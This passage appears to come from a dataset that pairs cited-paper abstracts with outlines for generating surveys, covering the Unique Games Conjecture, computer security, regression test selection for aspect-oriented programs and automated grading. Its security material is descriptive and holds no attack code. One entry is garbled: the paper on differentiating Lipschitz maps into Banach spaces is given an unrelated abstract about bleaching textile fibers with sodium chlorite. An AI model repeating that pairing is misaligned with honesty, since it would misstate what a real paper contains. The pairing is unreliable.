metrics. We obtain similar SDP integrality gaps for balanced separator, building on Devanur et al. (STOC 2006). We also exhibit, for explicit constants $\gamma, \delta ≫ 0$, an n-point negative-type metric which requires distortion $\Omega(\log\log n)^{\gamma}$ to embed into$\ell_1$, although all its subsets of size$\exp(\Omega(\log\log~n)^{\delta})$ embed isometrically into $\ell_1$. --- paper_title: Lp metrics on the Heisenberg group and the Goemans-Linial conjecture paper_content: We prove that the function d : \mathbb{R}^3 \times \mathbb{R}^3 \to [0,\infty ) given by d\left( {(x,y,z),(t,u,v)} \right)= \left( {[((t - x)^2 + (u - y)^2 )^2 + (v - z + 2xu - 2yt)^2 ]^{\frac{1} {2}} + (t - x)^2 + (u - y)^2 } \right)^{\frac{1} {2}} . is a metric on \mathbb{R}^3 such that (\mathbb{R}^3, \sqrt d ) is isometric to a subset of Hilbert space, yet (\mathbb{R}^3, d) does not admit a bi-Lipschitz embedding into L_1. This yields a new simple counter example to the Goemans-Linial conjecture on the integrality gap of the semidefinite relaxation of the Sparsest Cut problem. 
The metric above is doubling, and hence has a padded stochastic decomposition at every scale. We also study the L_p version of this problem, and obtain a counter example to a natural generalization of a classical theorem of Bretagnolle, Dacunha-Castelle and Krivine (of which the Goemans-Linial conjecture is a particular case). Our methods involve Fourier analytic techniques, and a recent breakthrough of Cheeger and Kleiner, together with classical results of Pansu on the differentiability of Lipschitz functions on the Heisenberg group. --- paper_title: The Unique Games Conjecture, Integrality Gap for Cut Problems and Embeddability of Negative Type Metrics into ℓ1 paper_content: In this paper, we disprove a conjecture of Goemans and Linial; namely, that every negative type metric embeds into $\ell_1$ with constant distortion. We show that for an arbitrarily small constant $\delta> 0$, for all large enough $n$, there is an $n$-point negative type metric which requires distortion at least $(\log\log n)^{1/6-\delta}$ to embed into $\ell_1.$ ::: Surprisingly, our construction is inspired by the Unique Games Conjecture (UGC) of Khot, establishing a previously unsuspected connection between probabilistically checkable proof systems (PCPs) and the theory of metric embeddings. We first prove that the UGC implies a super-constant hardness result for the (non-uniform) Sparsest Cut problem. Though this hardness result relies on the UGC, we demonstrate, nevertheless, that the corresponding PCP reduction can be used to construct an "integrality gap instance" for Sparsest Cut. Towards this, we first construct an integrality gap instance for a natural SDP relaxation of Unique Games. Then we "simulate" the PCP reduction and "translate" the integrality gap instance of Unique Games to an integrality gap instance of Sparsest Cut. This enables us to prove a $(\log \log n)^{1/6-\delta}$ integrality gap for Sparsest Cut, which is known to be equivalent to the metric embedding lower bound. --- paper_title: On the differentiation of Lipschitz maps from metric measure spaces to Banach spaces paper_content: A sodium chlorite bath for the bleaching of textile fibers, e.g. cotton, is activated by one or more bisulfite derivatives of an organic-reducing compound having one or more aldehyde or ketone functional groups and which are capable of forming bisulfitic combination addition compounds with an alkali bisulfite. Such activators have been found to be effective in bringing about the progressive decomposition of the sodium chlorite of the bath and hence controlled bleaching at relatively low temperatures of the sodium chlorite bath. --- paper_title: L_1 embeddings of the Heisenberg group and fast estimation of graph isoperimetry paper_content: We survey connections between the theory of bi-Lipschitz embeddings and the Sparsest Cut Problem in combinatorial optimization. The story of the Sparsest Cut Problem is a striking example of the deep interplay between analysis, geometry, and probability on the one hand, and computational issues in discrete mathematics on the other. We explain how the key ideas evolved over the past 20 years, emphasizing the interactions with Banach space theory, geometric measure theory, and geometric group theory. As an important illustrative example, we shall examine recently established connections to the the structure of the Heisenberg group, and the incompatibility of its Carnot-Carath\'eodory geometry with the geometry of the Lebesgue space $L_1$. 
--- paper_title: Compression bounds for Lipschitz maps from the Heisenberg group to $L_1$ paper_content: We prove a quantitative bi-Lipschitz nonembedding theorem for the Heisenberg group with its Carnot-Carathéodory metric and apply it to give a lower bound on the integrality gap of the Goemans-Linial semidefinite relaxation of the Sparsest Cut problem. --- paper_title: Spherical Cubes and Rounding in High Dimensions paper_content: What is the least surface area of a shape that tiles $\mathbb{R}^d$ under translations by $\mathbb{Z}^d$? Any such shape must have volume 1 and hence surface area at least that of the volume-1 ball, namely $\Omega(\sqrt{d})$. Our main result is a construction with surface area $O(\sqrt{d})$, matching the lower bound up to a constant factor of $2\sqrt{2\pi/e} \approx 3$. The best previous tile known was only slightly better than the cube, having surface area on the order of $d$. We generalize this to give a construction that tiles $\mathbb{R}^d$ by translations of any full rank discrete lattice $\Lambda$ with surface area $2\pi\|V^{-1}\|_F$, where $V$ is the matrix of basis vectors of $\Lambda$, and $\|\cdot\|_F$ denotes the Frobenius norm. We show that our bounds are optimal within constant factors for rectangular lattices. Our proof is via a random tessellation process, following recent ideas of Raz in the discrete setting. Our construction gives an almost optimal noise-resistant rounding scheme to round points in $\mathbb{R}^d$ to rectangular lattice points. --- paper_title: Understanding Parallel Repetition Requires Understanding Foams paper_content: Motivated by the study of parallel repetition and also by the unique games conjecture, we investigate the value of the "odd cycle games" under parallel repetition. Using tools from discrete harmonic analysis, we show that after $d$ rounds on the cycle of length $m$, the value of the game is at most $1 - (1/m)\cdot\bar{\Omega}(\sqrt{d})$ (for $d \le m^2$, say). This beats the natural barrier of $1 - \Theta(1/m)^2 \cdot d$ for Raz-style proofs and also the SDP bound of Feige-Lovasz; however, it just barely fails to have implications for unique games. On the other hand, we also show that improving our bound would require proving nontrivial lower bounds on the surface area of high-dimensional foams. Specifically, one would need to answer: what is the least surface area of a cell that tiles $\mathbb{R}^d$ by the lattice $\mathbb{Z}^d$? --- paper_title: Economical toric spines via Cheeger's Inequality paper_content: Let $G_{\infty}=(C_m^d)_{\infty}$ denote the graph whose set of vertices is $\{1,..., m\}^d$, where two distinct vertices are adjacent iff they are either equal or adjacent in $C_m$ in each coordinate. Let $G_{1}=(C_m^d)_1$ denote the graph on the same set of vertices in which two vertices are adjacent iff they are adjacent in one coordinate in $C_m$ and equal in all others. Both graphs can be viewed as graphs of the $d$-dimensional torus. We prove that one can delete $O(\sqrt d m^{d-1})$ vertices of $G_1$ so that no topologically nontrivial cycles remain. This improves an $O(d^{\log_2 (3/2)}m^{d-1})$ estimate of Bollobás, Kindler, Leader and O'Donnell. We also give a short proof of a result implicit in a recent paper of Raz: one can delete an $O(\sqrt d/m)$ fraction of the edges of $G_{\infty}$ so that no topologically nontrivial cycles remain in this graph. Our technique also yields a short proof of a recent result of Kindler, O'Donnell, Rao and Wigderson; there is a subset of the continuous $d$-dimensional torus of surface area $O(\sqrt d)$ that intersects all nontrivial cycles.
All proofs are based on the same general idea: the consideration of random shifts of a body with small boundary and no nontrivial cycles, whose existence is proved by applying the isoperimetric inequality of Cheeger or its vertex or edge discrete analogues. --- paper_title: On Systems of Linear Equations with Two Variables per Equation paper_content: For a prime p, max-2lin(p) is the problem of satisfying as many equations as possible from a system of linear equations modulo p, where every equation contains two variables. Hastad shows that this problem is NP-hard to approximate within a ratio of 11/12 + ε for p = 2, and Andersson, Engebretsen and Hastad show the same hardness of approximation ratio for p ≥ 11, and somewhat weaker results (such as 69/70) for p = 3, 5, 7. We prove that max-2lin(p) is easiest to approximate when p = 2, implying for every prime p that max-2lin(p) is NP-hard to approximate within a ratio of 11/12 + ε. For large p, we prove stronger hardness of approximation results. Namely, we show that there is some universal constant δ > 0 such that it is NP-hard to approximate max-2lin(p) within a ratio better than 1/p^δ. We use our results so as to clarify some aspects of Khot's unique games conjecture. Namely, we show that for every ε > 0 it is NP-hard to approximate the value of unique games within a ratio of ε. --- paper_title: Approximate Lasserre Integrality Gap for Unique Games paper_content: In this paper, we investigate whether a constant round Lasserre Semi-definite Programming (SDP) relaxation might give a good approximation to the Unique Games problem. We show that the answer is negative if the relaxation is insensitive to a sufficiently small perturbation of the constraints. Specifically, we construct an instance of Unique Games with k labels along with an approximate vector solution to t rounds of the Lasserre SDP relaxation. The SDP objective is at least 1 - ε whereas the integral optimum is at most γ, and all SDP constraints are satisfied up to an accuracy of δ > 0. Here ε, γ > 0 and t ∈ Z+ are arbitrary constants and k = k(ε, γ) ∈ Z+. The accuracy parameter δ can be made sufficiently small independent of the parameters ε, γ, t, k (but the size of the instance grows as δ gets smaller). ---
Title: On the Unique Games Conjecture (Invited Survey) Section 1: INTRODUCTION Description 1: This section introduces the Unique Games Conjecture (UGC), exploring its significance in computational complexity, algorithms, and other areas. It also mentions connections to inapproximability, discrete Fourier analysis, geometry, integrality gaps, algorithms, and parallel repetition. Section 2: Approximation Algorithms and Inapproximability Description 2: This section discusses the role of approximation algorithms in solving NP-complete problems, defining approximation factors and the impact of gap-preserving reductions. It includes subsections on the PCP Theorem and optimal inapproximability results. Section 3: The Unique Games Conjecture Description 3: This section elaborates on the Unique Games Conjecture itself, its definition, and some key observations. It also mentions the conjecture's implications and details flow to formalize certain properties. Section 4: Boolean Functions, Dictatorships, and Influence of Variables Description 4: Here, the concepts of boolean functions, dictatorship, and variable influence are described. It discusses how these play critical roles in the context of UGC-based inapproximability results. Section 5: Integrality Gaps Description 5: This section delves into how integrality gaps hinder polynomial time algorithms' ability to provide good approximate solutions. It includes a discussion on the MaxCut problem and the strategies for constructing explicit integrality gap instances. Section 6: VARIANTS OF THE Unique Games Conjecture Description 6: Different variants of the Unique Games Conjecture that are useful for proving inapproximability results are described in this section. It also discusses the equivalence of certain conjectures to the UGC. Section 7: INAPPROXIMABILITY RESULTS Description 7: This section lists main inapproximability results motivated by UGC, characterizing the exact approximation thresholds. It includes a sketch of a reduction from Unique Game problem to Min-2SAT-Deletion and discusses Raghavendra's result. Section 8: ALGORITHMS Description 8: This section summarizes algorithmic results related to UGC, detailing methods for approximating solutions to Unique Games and discussing the limitations of these algorithms. Section 9: DISCRETE FOURIER ANALYSIS Description 9: The importance of Fourier analysis in deducing inapproximability results is discussed in this section. Various Fourier analytic theorems and their applications to inapproximability are covered. Section 10: VARIANTS OF THE 2-Prover-1-Round Game Description 10: This section discusses generalizations and variants of the 2-Prover-1-Round games, including the Unique Game problem and related parallel repetition theorems. Section 11: GEOMETRY Description 11: This section explores the geometric aspects associated with the Unique Games Conjecture, discussing connections to Fourier analytic theorems and integrality gaps. It also touches on constructing foams using tiling of space. Section 12: CONCLUSION Description 12: The paper concludes with arguments for and against the Unique Games Conjecture, summarizing the current state of knowledge, its implications, and potential future research directions.
An Overview of Computer Security
4
--- paper_title: Password security: a case history paper_content: This paper describes the history of the design of the password security scheme on a remotely accessed time-sharing system. The present design was the result of countering observed attempts to penetrate the system. The result is a compromise between extreme security and ease of use. --- paper_title: Cryptography and data security paper_content: From the Preface (See Front Matter for full Preface) ::: ::: Electronic computers have evolved from exiguous experimental enterprises in the 1940s to prolific practical data processing systems in the 1980s. As we have come to rely on these systems to process and store data, we have also come to wonder about their ability to protect valuable data. ::: ::: Data security is the science and study of methods of protecting data in computer and communication systems from unauthorized disclosure and modification. The goal of this book is to introduce the mathematical principles of data security and to show how these principles apply to operating systems, database systems, and computer networks. The book is for students and professionals seeking an introduction to these principles. There are many references for those who would like to study specific topics further. ::: ::: Data security has evolved rapidly since 1975. We have seen exciting developments in cryptography: public-key encryption, digital signatures, the Data Encryption Standard (DES), key safeguarding schemes, and key distribution protocols. We have developed techniques for verifying that programs do not leak confidential data, or transmit classified data to users with lower security clearances. We have found new controls for protecting data in statistical databases--and new methods of attacking these databases. We have come to a better understanding of the theoretical and practical limitations to security. --- paper_title: An Experience Using Two Covert Channel Analysis Techniques on a Real System Design paper_content: This paper examines the application of two covert channel analysis techniques to a high level design for a real system, the Honeywell Secure Ada® Target (SAT). The techniques used were a version of the noninterference model of multilevel security due to Goguen and Meseguer and the shared resource matrix method of Kemmerer. Both techniques were applied to the Gypsy Abstract Model of the SAT. The paper discusses the application of the techniques and the nature of the covert channels discovered. The relative strengths and weaknesses of the two methods are discussed and criteria for an ideal covert channel tool are developed. --- paper_title: Abstract data types and software validation paper_content: A data abstraction can be naturally specified using algebraic axioms. The virtue of these axioms is that they permit a representation-independent formal specification of a data type. An example is given which shows how to employ algebraic axioms at successive levels of implementation. The major thrust of the paper is twofold. First, it is shown how the use of algebraic axiomatizations can simplify the process of proving the correctness of an implementation of an abstract data type. Second, semi-automatic tools are described which can be used both to automate such proofs of correctness and to derive an immediate implementation from the axioms. This implementation allows for limited testing of programs at design time, before a conventional implementation is accomplished. 
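As a rough illustration of how the algebraic-axiom idea in the preceding abstract supports limited design-time testing, the sketch below exercises a few stack axioms against a candidate implementation. The Stack class, the particular axioms, and the check_axioms helper are assumptions invented for this example and are not taken from the cited paper.

# Hypothetical sketch: checking algebraic axioms of a stack ADT against a candidate implementation.
class Stack:
    def __init__(self, items=()):
        self._items = list(items)
    def push(self, x):
        return Stack(self._items + [x])
    def pop(self):
        return Stack(self._items[:-1])
    def top(self):
        return self._items[-1]
    def is_empty(self):
        return not self._items
    def __eq__(self, other):
        return self._items == other._items

def check_axioms(values):
    """Exercise pop(push(s, x)) == s and top(push(s, x)) == x on sample data."""
    s = Stack()
    for x in values:
        assert s.push(x).pop() == s        # pop undoes push
        assert s.push(x).top() == x        # top sees the last pushed value
        assert not s.push(x).is_empty()    # a stack with a pushed element is non-empty
        s = s.push(x)
    return True

print(check_axioms([1, 2, 3]))  # True if every sampled axiom instance holds

Checks like these only sample the axioms on concrete inputs, which is exactly the kind of limited design-time testing the abstract describes, as opposed to a full correctness proof.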
--- paper_title: A penetration analysis of the Michigan Terminal System paper_content: The successful penetration testing of a major time-sharing operating system is described. The educational value of such a project is stressed, and principles of methodology and team organization are discussed as well as the technical conclusions from the study. --- paper_title: Password security: a case history paper_content: This paper describes the history of the design of the password security scheme on a remotely accessed time-sharing system. The present design was the result of countering observed attempts to penetrate the system. The result is a compromise between extreme security and ease of use. ---
Title: An Overview of Computer Security Section 1: THREATS Description 1: This section discusses various threats to computer security, including password guessing, spoofing, user browsing, Trojan horses, denial of service attacks, exhaustion of shared resources, and statistical database inferences. Section 2: THREAT CLASSIFICATION Description 2: This section attempts to categorize the various threats into specific types such as browsing, leakage, inference, tampering, accidental data destruction, masquerading, and denial of service. Section 3: PROTECTION MECHANISMS Description 3: This section introduces protection mechanisms used to enhance computer security, grouped into authentication mechanisms, access control, and inference control. It also covers penetration analysis, formal verification techniques, and covert channel analysis. Section 4: CONCLUSIONS Description 4: This section provides a brief overview and summarizes the topic of computer security, encouraging the reader to refer to other comprehensive sources for a more detailed study.
A Survey on Regression Test Selection Techniques on Aspect-Oriented Programming
6
--- paper_title: Composing crosscutting concerns using composition filters paper_content: It has been demonstrated that certain design concerns, such as access control, synchronization, and object interactions cannot be expressed in current OO languages as a separate software module [4, 7]. These so-called crosscutting concerns generally result in implementations scattered over multiple operations. If a crosscutting concern cannot be treated as a single module, its adaptability and reusability are likely to be reduced. A number of programming techniques have been proposed to express crosscutting concerns, for example, adaptive programming [9], AspectJ [8], Hyperspaces [10], and Composition Filters [1]. Here, we present the Composition Filters (CF) model and illustrate how it addresses evolving crosscutting concerns. --- paper_title: Aspect-oriented programming paper_content: The concept of a general purpose aspect is introduced where an aspect transparently forces cross-cutting behavior on object classes and other software entities. A reusable aspect is further described for use as part of an aspect library. --- paper_title: A Bee Colony Optimization Algorithm for Traveling Salesman Problem paper_content: A bee colony optimization (BCO) algorithm for traveling salesman problem (TSP) is presented in this paper. The BCO model is constructed algorithmically based on the collective intelligence shown in bee foraging behaviour. Experimental results comparing the proposed BCO model with some existing approaches on a set of benchmark problems are presented. --- paper_title: Empirical Studies of a Safe Regression Test Selection Technique paper_content: Regression testing is an expensive testing procedure utilized to validate modified software. Regression test selection techniques attempt to reduce the cost of regression testing by selecting a subset of a program's existing test suite. Safe regression test selection techniques select subsets that, under certain well-defined conditions, exclude no tests (from the original test suite) that if executed would reveal faults in the modified software. Many regression test selection techniques, including several safe techniques, have been proposed, but few have been subjected to empirical validation. This paper reports empirical studies on a particular safe regression test selection technique, in which the technique is compared to the alternative regression testing strategy of running all tests. The results indicate that safe regression test selection can be cost-effective, but that its costs and benefits vary widely based on a number of factors. In particular, test suite design can significantly affect the effectiveness of test selection, and coverage-based test suites may provide test selection results superior to those provided by test suites that are not coverage-based. --- paper_title: A firewall concept for both control-flow and data-flow in regression integration testing paper_content: The authors present a methodology for regression testing and function or system testers. The methodology involves regression testing of modules where dependencies due to both control flow and data flow are taken into account. The control-flow dependency is modeled as a call graph and a firewall defined to include all affected modules which must be retested. Global variables are considered as the remaining data-flow dependency to be modeled. 
An approach to testing and regression testing of these global variables is given, and a firewall concept for the data-flow aspect of software change is defined. --- paper_title: An Improved Method of Selecting regression Tests for C++ Programs paper_content: This paper describes an impact analysis technique that identifies which parts should be retested after a system written in C++ is modified. We are interested in identifying the impacts of changes at the class member level by using dependency relations between class members. We try to find out which member functions need unit-level retesting and which interactions between them need integration-level retesting. To get precise analysis results, we adopt a technique that classifies types of changes and analyze the impact for each type. Primitive changes, changes which are associated with C++ features, are first defined and their ripple effects are computed in order to construct a firewall for each type of change systematically. We have applied our prototype tool to a real system of small size. This case study shows some evidence that our approach gives reasonable efficiency and precision as well as being practical for analyzing change impacts of C++ programs. --- paper_title: Regression test selection for Java software paper_content: Regression testing is applied to modified software to provide confidence that the changed parts behave as intended and that the unchanged parts have not been adversely affected by the modifications. To reduce the cost of regression testing, test cases are selected from the test suite that was used to test the original version of the software---this process is called regression test selection. A safe regression-test-selection algorithm selects every test case in the test suite that may reveal a fault in the modified software. This paper presents a safe regression-test-selection technique that, based on the use of a suitable representation, handles the features of the Java language. Unlike other safe regression test selection techniques, the presented technique also handles incomplete programs. The technique can thus be safely applied in the (very common) case of Java software that uses external libraries of components; the analysis of the external code is not required for the technique to select test cases for such software. The paper also describes RETEST, a regression-test-selection algorithm that can be effective in reducing the size of the test suite. --- paper_title: Scaling regression testing to large software systems paper_content: When software is modified, during development and maintenance, it is regression tested to provide confidence that the changes did not introduce unexpected errors and that new features behave as expected. One important problem in regression testing is how to select a subset of test cases, from the test suite used for the original version of the software, when testing a modified version of the software. Regression-test-selection techniques address this problem. Safe regression-test-selection techniques select every test case in the test suite that may behave differently in the original and modified versions of the software. Among existing safe regression testing techniques, efficient techniques are often too imprecise and achieve little savings in testing effort, whereas precise techniques are too expensive when used on large systems.
This paper presents a new regression-test-selection technique for Java programs that is safe, precise, and yet scales to large systems. It also presents a tool that implements the technique and studies performed on a set of subjects ranging from 70 to over 500 KLOC. The studies show that our technique can efficiently reduce the regression testing effort and, thus, achieve considerable savings. --- paper_title: An approach for selective state machine based regression testing paper_content: Model-based regression testing is an important activity that ensures the reliability of evolving software. One of the major issues in this type of testing is the optimal selection of test-cases to test the affected portion of the software. In this paper, we present a UML based selective regression testing strategy that uses state machines and class diagrams for change identification. We identify the changes using the UML 2.1 semantics of state machines and class diagram. The changes are classified as Class-driven (obtained from class diagram) and State-driven (obtained from state machine). The Class-driven changes are important as these changes are not reflected on the state machines and they might be helpful in identifying some fault-revealing test cases. With the help of the identified changes, we classify the test cases of the test suite as Obsolete, Reusable, and Retestable. We apply the approach on a case study to demonstrate its validity. --- paper_title: A Model-Based Regression Testing Approach for Evolving Software Systems with Flexible Tool Support paper_content: Model-based selective regression testing promises reduction in cost and labour by selecting a subset of the test suite corresponding to the modifications after system evolution. However, identification of modifications in the systems and selection of corresponding test cases is challenging due to interdependencies among models. State-based testing is an important approach to test the system behaviour. Unfortunately the existing state-based regression testing approaches do not care for dependencies of the state machines with other system models. This paper presents the tool support and evaluation of our state-based selective regression testing methodology for evolving state-based systems. START is an Eclipse-based tool for state-based regression testing compliant with UML 2.1 semantics. START deals with dependencies of state machines with class diagrams to cater for the change propagation. We applied the START on a case study and our results show significant reduction in the test cases resulting in reduction in testing time and cost. --- paper_title: Using traceability to support model-based regression testing paper_content: Model-driven development is leading to increased use of models in conjunction with source code in software testing. Model-based testing, however, introduces new challenges for testing activities, which include creation and maintenance of traceability information among test-related artifacts. Traceability is required to support activities such as selective regression testing. In fact, most model-based testing automated approaches often concentrate on the test generation and execution activities, while support to other activities is limited (e.g. model-based selective regression testing, coverage analysis and behavioral result evaluation) To address this problem, we propose a solution that uses model transformation to create a traceable infrastructure of test-related artifacts. 
We use this infrastructure to support model-based selective regression testing. --- paper_title: Specification-Based Approach to Select Regression Test Suite to Validate Changed Software paper_content: Regression testing is used to achieve adequate confidence in changed software. To achieve confidence, organizations currently re-execute the entire system test suite on the entire software. Re-executing the entire system test suite is an expensive and time-consuming activity. To reduce such costs, execution of a smaller regression test suite to validate the changed software is suggested. Several techniques, both code-based and model-based, that recommend smaller regression test suites have been proposed in the literature. Largely, the model-based regression test selection techniques are based on design models. In this paper, we propose a regression test suite selection approach based on a commonly used requirement analysis model, the UML use case activity diagram. As a part of the approach we also propose a concept called behavioral slicing to structure activity diagrams. Based on the proposed approach, a prototype tool has been designed and developed. Using the prototype, we have conducted real-world case studies and observed impressive productivity and quality gains. --- paper_title: Regression test selection for Java software paper_content: Regression testing is applied to modified software to provide confidence that the changed parts behave as intended and that the unchanged parts have not been adversely affected by the modifications. To reduce the cost of regression testing, test cases are selected from the test suite that was used to test the original version of the software---this process is called regression test selection. A safe regression-test-selection algorithm selects every test case in the test suite that may reveal a fault in the modified software. This paper presents a safe regression-test-selection technique that, based on the use of a suitable representation, handles the features of the Java language. Unlike other safe regression test selection techniques, the presented technique also handles incomplete programs. The technique can thus be safely applied in the (very common) case of Java software that uses external libraries of components; the analysis of the external code is not required for the technique to select test cases for such software. The paper also describes RETEST, a regression-test-selection algorithm that can be effective in reducing the size of the test suite. --- paper_title: A safe, efficient regression test selection technique paper_content: Regression testing is an expensive but necessary maintenance activity performed on modified software to provide confidence that changes are correct and do not adversely affect other portions of the software. A regression test selection technique chooses, from an existing test set, tests that are deemed necessary to validate modified software. We present a new technique for regression test selection. Our algorithms construct control flow graphs for a procedure or program and its modified version and use these graphs to select tests that execute changed code from the original test suite. We prove that, under certain conditions, the set of tests our technique selects includes every test from the original test suite that can expose faults in the modified procedure or program. Under these conditions our algorithms are safe.
Moreover, although our algorithms may select some tests that cannot expose faults, they are at least as precise as other safe regression test selection algorithms. Unlike many other regression test selection algorithms, our algorithms handle all language constructs and all types of program modifications. We have implemented our algorithms; initial empirical studies indicate that our technique can significantly reduce the cost of regression testing modified software. --- paper_title: A framework and tool supports for generating test inputs of AspectJ programs paper_content: Aspect-oriented software development is gaining popularity with the wider adoption of languages such as AspectJ. To reduce the manual effort of testing aspects in AspectJ programs, we have developed a framework, called Aspectra, that automates generation of test inputs for testing aspectual behavior, i.e., the behavior implemented in pieces of advice or intertype methods defined in aspects. To test aspects, developers construct base classes into which the aspects are woven to form woven classes. Our approach leverages existing test-generation tools to generate test inputs for the woven classes; these test inputs indirectly exercise the aspects. To enable aspects to be exercised during test generation, Aspectra automatically synthesizes appropriate wrapper classes for woven classes. To assess the quality of the generated tests, Aspectra defines and measures aspectual branch coverage (branch coverage within aspects). To provide guidance for developers to improve test coverage, Aspectra also defines interaction coverage. We have developed tools for automating Aspectra's wrapper synthesis and coverage measurement, and applied them on testing 12 subjects taken from a variety of sources. Our experience has shown that Aspectra effectively provides tool support in enabling existing test-generation tools to generate test inputs for improving aspectual branch coverage. --- paper_title: AutoFlow: An automatic debugging tool for AspectJ software paper_content: Aspect-oriented programming (AOP) is gaining popularity with the wider adoption of languages such as AspectJ. During AspectJ software evolution, when regression tests fail, it may be tedious for programmers to find out the failure-inducing changes by manually inspecting all code edits. To eliminate the expensive effort spent on debugging, we developed AutoFlow, an automatic debugging tool for AspectJ software. AutoFlow integrates the potential of the delta debugging algorithm with the benefit of change impact analysis to narrow down the search for faulty changes. It first uses change impact analysis to identify a subset of responsible changes for a failed test, then ranks these changes according to our proposed heuristic (indicating the likelihood that they may have contributed to the failure), and finally employs an improved delta debugging algorithm to determine a minimal set of faulty changes. The main feature of AutoFlow is that it can automatically reduce a large portion of irrelevant changes in an early phase, and then locate faulty changes effectively. ---
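The minimization step described in the AutoFlow abstract above can be illustrated with a small sketch in the spirit of delta debugging (an illustrative simplification, not code from the cited tool); the fails predicate and the list of change identifiers below are assumptions made for the example.

# Hypothetical sketch: greedy minimization of a set of suspect changes,
# in the spirit of delta debugging (simplified; real ddmin partitions into n subsets).
def minimize_failing_changes(changes, fails):
    """Return a smaller subset of `changes` for which `fails` still returns True."""
    current = list(changes)
    reduced = True
    while reduced:
        reduced = False
        for c in list(current):
            candidate = [x for x in current if x != c]
            if fails(candidate):      # the failure still reproduces without this change
                current = candidate
                reduced = True
    return current

# Toy usage: the regression test "fails" whenever changes 2 and 5 are both applied.
fails = lambda cs: 2 in cs and 5 in cs
print(minimize_failing_changes([1, 2, 3, 4, 5, 6], fails))   # [2, 5]

The result is 1-minimal in the delta-debugging sense: removing any single remaining change makes the failure disappear, which is the kind of "minimal set of faulty changes" the abstract refers to.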
Title: A Survey on Regression Test Selection Techniques on Aspect-Oriented Programming Section 1: INTRODUCTION Description 1: Introduce regression testing, its importance, and how it applies to aspect-oriented programming. Section 2: Regression test selection for aspect oriented programs Description 2: Discuss the need for regression testing in aspect-oriented programming and the techniques that are used to perform regression test selection, emphasizing the unique features of aspect-oriented programming. Section 3: RTS Technique for Object Oriented Programs Description 3: Outline various regression test selection techniques used for object-oriented programs, including Firewall Technique, Program Model Based approaches, Extended Control Flow Graph, Partition Based techniques, Design Model Based Technique, and Specification Based Technique. Section 4: RTS Technique for Aspect Oriented Programs Description 4: Detail specific regression test selection techniques for aspect-oriented programs, including the approaches by Rothermel and Harrold, Guoqing Xu, Mark Harman & Tao Xie, and various tools used for aspect-oriented programs. Section 5: Tools for Aspect-Oriented Programs Description 5: Describe the tools available for regression testing in aspect-oriented programming, including the ORTS tool, the Automatic Debugging tool (AutoFlow), and the Celadon tool. Section 6: Conclusion and Future Work Description 6: Summarize the survey findings, discuss the advantages and limitations of the techniques and tools reviewed, and propose directions for future research and improvements in regression test selection techniques for aspect-oriented programming.
Automated Grading Systems for Programming Assignments: A Literature Review
14
--- paper_title: Using testing and JUnit across the curriculum paper_content: While the usage of unit-testing frameworks such as JUnit has greatly increased over the last several years, it is not immediately apparent to students and instructors how to best use tools like JUnit and how to integrate testing across a computer science curriculum. We have worked over the last four semesters to infuse testing and JUnit across our curriculum, building from having students use JUnit to having them write their own test cases to building larger integration and use case testing systems to studying JUnit as an example of good application of design patterns. We have found that, based on this increased presentation and structuring of the usage of JUnit and testing, students have an increased understanding and appreciation of the overall value of testing in software development. --- paper_title: Automated feedback generation for introductory programming assignments paper_content: We present a new method for automatically providing feedback for introductory programming problems. In order to use this method, we need a reference implementation of the assignment, and an error model consisting of potential corrections to errors that students might make. Using this information, the system automatically derives minimal corrections to student's incorrect solutions, providing them with a measure of exactly how incorrect a given solution was, as well as feedback about what they did wrong. We introduce a simple language for describing error models in terms of correction rules, and formally define a rule-directed translation strategy that reduces the problem of finding minimal corrections in an incorrect program to the problem of synthesizing a correct program from a sketch. We have evaluated our system on thousands of real student attempts obtained from the Introduction to Programming course at MIT (6.00) and MITx (6.00x). Our results show that relatively simple error models can correct on average 64% of all incorrect submissions in our benchmark set. --- paper_title: Sketching stencils paper_content: Performance of stencil computations can be significantly improved through smart implementations that improve memory locality, computation reuse, or parallelize the computation. Unfortunately, efficient implementations are hard to obtain because they often involve non-traditional transformations, which means that they cannot be produced by optimizing the reference stencil with a compiler. In fact, many stencils are produced by code generators that were tediously handcrafted. In this paper, we show how stencil implementations can be produced with sketching. Sketching is a software synthesis approach where the programmer develops a partial implementation--a sketch--and a separate specification of the desired functionality given by a reference (unoptimized) stencil. The synthesizer then completes the sketch to behave like the specification, filling in code fragments that are difficult to develop manually. Existing sketching systems work only for small finite programs, i.e.,, programs that can be represented as small Boolean circuits. In this paper, we develop a sketching synthesizer that works for stencil computations, a large class of programs that, unlike circuits, have unbounded inputs and outputs, as well as an unbounded number of computations. The key contribution is a reduction algorithm that turns a stencil into a circuit, allowing us to synthesize stencils using an existing sketching synthesizer. 
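For readers unfamiliar with the stencil terminology used in the abstract above, a reference (unoptimized) stencil is essentially a plain loop nest that defines the desired functionality. The sketch below is an assumed, illustrative example of such a reference implementation; it is not taken from the cited paper, and the smooth_once name and the three-point averaging rule are choices made only for this example.

# Hypothetical reference stencil: one smoothing sweep over a 1-D array,
# where each interior cell becomes the average of itself and its two neighbours.
def smooth_once(values):
    out = list(values)                      # boundary cells are copied unchanged
    for i in range(1, len(values) - 1):
        out[i] = (values[i - 1] + values[i] + values[i + 1]) / 3.0
    return out

print(smooth_once([0.0, 0.0, 3.0, 0.0, 0.0]))  # [0.0, 1.0, 1.0, 1.0, 0.0]

A sketching synthesizer of the kind described above would take a simple specification like this and fill in the missing details of a tiled or otherwise optimized implementation that must behave identically.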
--- paper_title: ConcJUnit: unit testing for concurrent programs paper_content: In test-driven development, tests are written for each program unit before the code is written, ensuring that the code has a comprehensive unit testing harness. Unfortunately, unit testing is much less effective for concurrent programs than for conventional sequential programs, partly because extant unit testing frameworks provide little help in addressing the challenges of testing concurrent code. In this paper, we present ConcJUnit, an extension of the popular unit testing framework JUnit that simplifies the task of writing tests for concurrent programs by handling uncaught exceptions and failed assertions in all threads, and by detecting child threads that were not forced to terminate before the main thread ends. --- paper_title: Programming by sketching for bit-streaming programs paper_content: This paper introduces the concept of programming with sketches, an approach for the rapid development of high-performance applications. This approach allows a programmer to write clean and portable reference code, and then obtain a high-quality implementation by simply sketching the outlines of the desired implementation. Subsequently, a compiler automatically fills in the missing details while also ensuring that a completed sketch is faithful to the input reference code. In this paper, we develop StreamBit as a sketching methodology for the important class of bit-streaming programs (e.g., coding and cryptography).A sketch is a partial specification of the implementation, and as such, it affords several benefits to programmer in terms of productivity and code robustness. First, a sketch is easier to write compared to a complete implementation. Second, sketching allows the programmer to focus on exploiting algorithmic properties rather than on orchestrating low-level details. Third, a sketch-aware compiler rejects "buggy" sketches, thus improving reliability while allowing the programmer to quickly evaluate sophisticated implementation ideas.We evaluated the productivity and performance benefits of our programming methodology in a user-study, where a group of novice 